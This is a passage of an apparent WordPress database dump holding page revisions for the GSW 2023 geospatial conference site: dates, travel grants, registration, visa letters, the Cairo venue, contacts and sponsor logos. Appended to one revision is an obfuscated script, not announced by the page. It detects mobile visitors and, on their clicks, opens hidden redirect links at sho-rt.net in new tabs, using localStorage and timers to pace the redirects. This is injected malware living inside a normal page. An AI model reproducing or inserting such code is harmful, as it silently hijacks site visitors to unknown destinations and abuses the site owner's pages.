2023</strong></li>\n<li><strong>Early bird registration deadline: July 1, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 20:52:21','2023-06-13 20:52:21','',3066,'https://gsw2023.com/?p=4679',0,'revision','',0),
(4680,1,'2023-06-13 20:52:58','2023-06-13 20:52:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver 